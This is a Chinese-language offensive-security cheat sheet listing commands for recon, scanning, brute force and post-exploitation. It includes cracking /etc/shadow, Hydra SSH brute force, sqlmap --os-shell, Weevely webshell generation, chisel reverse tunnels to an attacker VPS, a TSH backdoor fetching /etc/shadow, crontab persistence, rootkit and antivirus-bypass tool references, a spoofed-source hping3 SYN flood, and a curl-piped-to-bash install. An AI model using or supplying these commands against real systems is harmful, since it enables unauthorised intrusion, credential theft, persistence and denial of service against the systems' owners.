主域名收集
站长之家备案查询
https://icp.chinaz.com/
站长之家whois查询
https://whois.chinaz.com/
同注册者下其他域名信息
https://website.informer.com/
子域名收集
oneforall
python oneforall.py --target example.com run # 单域名查询
python oneforall.py --targets ./domains.txt run # 批量查询
ESD
esd -d qq.com
fofa
https://fofa.info/
google语法
info: 查看指定站点的基本信息
intitle: 标题搜索(只会对页面的标题搜索配对)
intext: 内容(正文)搜索
inurl: 对url进行限制,搜索url中含有关键字的内容
filetype: 对文档类型进行限定
related: 搜索相关信息(辅助搜索同类型网站)
link: 搜索所有链接到某个特定url的页面
site: 搜索限制在站点域名之内(可用来搜索子域名)例:site:baidu.com
端口扫描
fscan
wget https://github.com/shadow1ng/fscan/releases/download/1.8.4/fscan
./fscan -h 10.0.0.1
./fscan -hf C.txt
masscan
masscan.exe -p80,8080-8100 10.0.0.0/8 --max-rate 10000 --banners --source-port 61000 -oJ f.json
masscan.exe -p0-65535 -iL ip.txt --max-rate 10000 --banners --source-port 61000 -oJ f.json
masscan.exe -p0-65535 115.126.76.126 --max-rate 100000
RustScan
rustscan --ulimit 5000 -a ip.txt
rustscan --ulimit 5000 -a 192.168.16.34
rustscan -g -a ./live_ip
nmap
nmap -sT --min-rate 10000 -p- 114.242.0.0
nmap -sT --min-rate 10000 -p- -iL ip.txt
nmap -sT -sC -sV -O -p85 114.242.0.0
nmap --script=vuln -p80 114.242.0.0
nmap -T4 -A -v -Pn IP
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse MACHINE_IP
cdn识别
Eeyes
Eeyes.exe -l subdomain.txt
指纹扫描
ObserverWard
observer_ward.exe -u #更新指纹库
observer_ward.exe -t url #单个地址识别
observer_ward.exe -f url.txt #批量识别
observer_ward.exe -f url.txt --proxy http://127.0.0.1:7890
observer_ward.exe -f url.txt -c 1.csv 3导出为csv文件
EHole
EHole.exe fofaext -l ip.txt
EHole.exe finger -l url.txt
TideFinger
TideFinger -h 192.0.0.1/24 -p 80 -np -nobr -nopoc 探测C段开放80端口的服务指纹,不使用ping,不暴力破解,不检测poc
TideFinger -uf url.txt -nobr -nopoc -pt 120 探测指定url文件的指纹,每个服务指纹超时为120秒
TideFinger -u http://www.tidesec.com -pd 探测指定url的指纹,检测poc,并显示poc的详细数据
信息整理收集自动化
jsfinder
python JSFinder.py -u http://www.xx.com -d
python JSFinder.py -f text.txt -j
-d 深度爬取
githeacker
githacker --brute --url http://24dy.me/.git --output-folder ~/
gowitness
# Screenshot a single website
gowitness single https://www.google.com/
# Screenshot a cidr using 20 threads
gowitness scan --cidr 192.168.0.0/24 --threads 20
# Screenshot open http services from an namp file
gowitness nmap -f nmap.xml --open --service-contains http
# Run the report server
gowitness report serve
PackerFuzzer
python PackerFuzzer.py -u http://itops.trial.com -t adv -f 1 -r html
python PackerFuzzer.py -u http://itops.trial.com -f 1 -r html
EyeWitness
EyeWitness.exe -f C:\Path\to\urls.txt
./EyeWitness.py -f url.txt --timeout 30
eyewitness -f url.txt --timeout 30
Eyeurl
python eyeurl.py -f C:\test.txt -t 30
快速打点
Tscan
Vscan
vscan -host 127.0.0.1
vscan -host 127.0.0.1 -p 7001,7002
vscan -host 127.0.0.1 -proxy socks5://127.0.0.1:1080
nuclei
nuclei -severity critical,high -list http_urls.txt
nuclei -severity critical,high -u http://114.242.22.22/
nuclei -ut #更新模板
-timeout #设定超时时间
POC bomber
python3 pocbomber.py -u http://xxx.xxx.xx #单目标检测
python3 pocbomber.py -f url.txt -o report.txt #批量检测
python3 pocbomber.py -f url.txt --poc="thinkphp2_rce.py" #指定poc检测
python3 pocbomber.py -u 目标url --poc="指定poc文件" --attack #exp攻击模式
Xray
xray webscan --listen 127.0.0.1:7777 --html-output xxx.html
Mars
访问:127.0.0.1:5000
密码:tidesec
AWVS:127.0.0.1:13443
账号tide@tidesec.com/Tide@2020
wpscan
wpscan --url http://dc-2 --enumerate vp,vt,tt,u --api-token 你自己的token
wpscan --update
wpscan --url http://dc-2 -P passwords.txt -U username.txt --api-token 你自己的token
-t 4 最大线程数
komo
https://github.com/komomon/Komo
xray webscan --listen 127.0.0.1:7777 --html-output 1.html
sqlmap
--dbs显示所有数据库名称
-D(数据库名)选择数据库
--tables显示所有表
-T(表名)选择表
--columns显示所有字段
-C(字段名)选择字段
--dump显示字段内容
--dump-all拖库
--sql-shell运行自定义Sql语句
--os-shell生成上传点写入shell(-file-write写入本地文件,-file-dest要写入文件的绝对路径)
--dbms指定数据库类型
--os指定操作系统
--data=””通过post发送数据参数
--level探测等级,增加payload,level>2会检测cookie注入
--risk测试大部分测试语句增加等级会增加测试语句的复杂度
--is-dba当前用户是否为管理权限
--roles列出数据库管理员角色
--batch采用默认选项
--current-db猜解当前数据库名
--random-agent使用随机请求头
--privileges
目录扫描
dirsearch
python dirsearch.py -u http://192.168.52.143
python dirsearch.py --random-agent -r -l /home/kali/Public/url.txt
-l 指定url文件
-e 指定网站语言
-w 指定字典
-r 递归目录(跑出目录后,继续跑目录下面的目录)
--random-agent 使用随机UA
--subdirs 扫描子目录 如(admin/ 则www.example.com/admin/+字典)
--prefixes 添加自定义前缀
--suffixes 添加自定义后缀
--proxy=127.0.0.1:20171
gobuster
sudo gobuster dir -u http://10.10.10.10 --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
或者
/usr/share/wordlists/dirb/big.txt
--exclude-length 9360,4453 # 排除长度为9360和4453的响应
-t 50 #开启50个线程
-r #递归扫描子目录
-k #忽略ssl报错
--wordlist-offset int #从字典第几行开始
爆破枚举
john
unshadow /etc/passwd /etc/shadow > pass_hash
john pass_hash
john --format=crypt pass_hash
john --wordlist=pass.txt passwd_shadow
john jon.hash --format=NT --wordlist=/opt/rockyou.txt --show #破解windows密码
# 爆破ssh 私钥文件密码
locate ssh2john
./ssh2john.py ~/id_rsa > ~/hash
john hash --wordlist=rockyou.txt
hydra
hydra -l root -P /tmp/passwd.txt -t 4 -v 192.168.57.101 ssh
enum4linux
enum4linux -a <MACHINE IP> # 枚举smb用户名
# 参数列表
-U # 获取用户列表
-M # 获取机器列表
-S # 获取共享列表
-P # 获取密码策略信息
-G # 获取组和成员列表
-d # 详述,适用于-U和-S
-u # user 用户指定要使用的用户名(默认为空)
-p # 指定要使用的密码(默认为空)
ffuf
ffuf -u http://192.168.111.131/FUZZ -w fuzz.txt
-fc 过滤状态码
-fl 过滤响应包的行数
-fw 过滤字数
-fs 过滤大小
-fr 过滤正则
-x 设置代理
内网
Weevely
weevely generate password ~/shell.php
weevely http://192.168.1.1/shell/shell.php password
chisel
1. chisel进行ssh内网穿透
//vps上 ./chisel server -p 6666 --reverse //靶机上 ./chisel client -v VPS:6666 R:0.0.0.0:8888:192.168.223.160:22 ./chisel client -v VPS:6666 R:8888:192.168.223.160:22 //攻击机上 ssh -p 8888 root@VPS
2. chisel进行远程桌面代理
//vps上 ./chisel server -p 6666 --reverse //靶机上 chisel.exe client -v VPS:6666 R:0.0.0.0:33389:192.168.223.151:3389 //攻击机上连接vps的33389端口
3. chisel进行socks代理
//vps上 ./chisel server -p 6666 --reverse //靶机上 chisel.exe client VPS:6666 R:socks //随后在vps上 ssh -C -f -N -g -L 0.0.0.0:23333:127.0.0.1:1080 root@VPS //127.0.0.1监听的是本机上的所有流量,0.0.0.0监听的是所有的IP(不论是不是本机的IP)的流量。所以在vps上把127.0.0.1的1080上的socks流量转发到0.0.0.0的23333端口 //攻击机上使用socksCap或者直接在浏览器中设置代理对内网资源进行访问
netspy
# 下载
https://github.com/shmilylty/netspy
wget https://github.com/shmilylty/netspy/releases/download/v0.0.5/netspy_linux_amd64.zip
# 使用
netspy is
TSH
https://github.com/creaktive/tsh
# 编译
make <system> 如make linux
# server
umask 077; HOME=/var/tmp ./tshd
# client
- start a shell:
./tsh <hostname>
- execute a command:
./tsh <hostname> "uname -a"
- transfer files:
./tsh <hostname> get /etc/shadow .
./tsh <hostname> put vmlinuz /boot
ssh 隧道转发
ssh -L 10000:localhost:10000 <username>@<ip>
linenux
# LinEnum
https://github.com/rebootuser/LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
traitor
./traitor
https://github.com/liamg/traitor/releases/download/v0.0.14/traitor-amd64
-p # 如果有密码可添加该参数
-a # 尝试所有漏洞
-e # 尝试特定漏洞
添加定时任务
(echo "* * * * * /tmp/aaa") | crontab -
docker进入容器
docker exec -it 91af26862191 /bin/bash
HackerPermKeeper
查看帮助
python main.py -h
快速判断目标机器适合的权限维持模块
cd check
python check.py
查看权限维持模详细块信息
python main.py -c 2
使用此项目生成权限维持脚本
python main.py -m 1 #选择模块[6.0更新之后,可以连续选择]
Reptile
https://github.com/f0rb1dd3n/Reptile/
免杀
FourEye
python3 BypassFramework.py
杂项
ApkAnalyser
403bypasser
python3 403bypasser.py -u https://example.com -d /secret example.txt
searchsploit
searchsploit linux 5.15.0-56
searchsploit -m 5080.c
PowerUp
下载位置
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
使用方法
加载脚本
powershell.exe -nop -exec bypass Import-Module .\PowerUp.psm1
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}" # cmd模式下运行脚本
查看所有模块
PS E:\> Get-Command -Module powerup
进行所有检查
Invoke-AllChecks | Out-File -Encoding ASCII checks.txt
smbclient
smbclient //10.10.239.150/anonymous
smbclient -U milesdyson //10.10.164.81/milesdyson
#递归下载所有文件
recurse ON
prompt OFF
mget *
本机套接字查看
ss -tulpn
加密方式查询
https://hashcat.net/wiki/doku.php?id=example_hashes
proxychains
vim /etc/proxychains.conf
socks5 连接IP地址 连接端口 用户名 密码
hping3
hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.63
wsl设置代理
export ALL_PROXY="http://192.168.154.129:7890"
windows命令行走代理
set all_proxy=http://127.0.0.1:7890
查看终端IP出口地址
curl cip.cc
ssh 断开连接继续执行命令
nohup python3.7 dirsearch.py --random-agent -r -l ./url &
浏览器必备插件
whatRuns
wappalyzer
findsomething
webrtc leak shield #防止因为webrtc泄露真实ip
webshell
php
php反弹shell
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
js hook
捕捉cookie
(function () {
'use strict';
var cookieTemp = '';
Object.defineProperty(document, 'cookie', {
set: function (val) {
if (val.indexOf('__dfp') != -1) { //第一次出现__dfp时卡住断点
debugger;
}
console.log('Hook捕获到cookie设置->', val);
cookieTemp = val;
return val;
},
get: function () {
return cookieTemp;
},
});
})();
yakit
# 下载使用
bash <(curl -sS -L http://oss.yaklang.io/install-latest-yak.sh)
# 启动远程模式
yak grpc --host 0.0.0.0 --port 8895 --secret Um9vdDEeMBwGA1UEBxMVWWFraXQgVGVhbVNlcnZlciBSb290MR4wHAYDVQQKExVZ --tls
# AES加密
aesEncrypt = func(param) {
key = []byte("8NONwyJtHesysWpM")
outdata = codec.AESECBEncrypt(key, param,nil)[0]
outdata = codec.EncodeBase64(outdata)
return outdata
}
# AES解密
aesDecrypt = func(param) {
key = []byte("8NONwyJtHesysWpM")
outdata = codec.DecodeBase64(param)[0]
outdata = codec.AESECBDecrypt(key, outdata, nil)[0]
outdata = codec.EncodeASCII(outdata)
return outdata
}
# MD5
md5 = func(param) {
outdata = codec.Md5(param)
return outdata
}
# 自动分段传输
beforeRequest = func(req) {
return poc.ReplaceHTTPPacketHeader([]byte(poc.ReplaceBody(req, codec.EncodeChunked(poc.GetHTTPPacketBody(req)), false)),"Transfer-Encoding","chunked")
}